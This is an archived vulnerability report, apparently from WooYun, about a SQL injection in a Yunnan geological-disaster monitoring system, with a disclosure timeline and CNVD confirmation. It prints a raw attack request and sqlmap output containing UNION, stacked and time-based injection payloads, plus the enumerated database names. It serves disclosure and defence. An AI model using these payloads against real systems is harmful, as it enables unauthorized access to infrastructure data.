乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-13: 细节已通知厂商并且等待厂商处理中 2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-08-24: 细节向核心白帽子及相关领域专家公开 2015-09-03: 细节向普通白帽子公开 2015-09-13: 细节向实习白帽子公开 2015-09-28: 细节向公众公开
云南某地质灾害监测预警与应急决策支持系统SQL注入
**.**.**.**/
POST /ashx/htgl/yqgl/seleimg.ashx HTTP/1.1Content-Length: 101Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: **.**.**.**:80/Login.htmlCookie: ASP.NET_SessionId=rinnpnsgjhysxlnfrnqvaab2Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*dadddte=1439269261771&eqidd=123&urltype=############
sqlmap identified the following injection points with a total of 317 HTTP(s) requests:---Parameter: eqidd (POST) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: dadddte=1439269261771&eqidd=123' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(119)+CHAR(120)+CHAR(115)+CHAR(116)+CHAR(76)+CHAR(66)+CHAR(112)+CHAR(90)+CHAR(88)+CHAR(119)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL-- &urltype=############ Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dadddte=1439269261771&eqidd=123'; WAITFOR DELAY '0:0:20'--&urltype=############ Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dadddte=1439269261771&eqidd=123' WAITFOR DELAY '0:0:20'--&urltype=############---[13:43:42] [INFO] testing Microsoft SQL Server[13:43:42] [INFO] confirming Microsoft SQL Server[13:43:43] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008[13:43:43] [INFO] fetching database namesavailable databases [11]:[*] DB_DZSJ[*] DB_RECIVE[*] DB_ZHJC[*] earthBreath[*] JCYQ_STATUS[*] master[*] model[*] msdb[*] tb_test[*] tempdb[*] xmgldb
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-08-14 16:41
CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。
暂无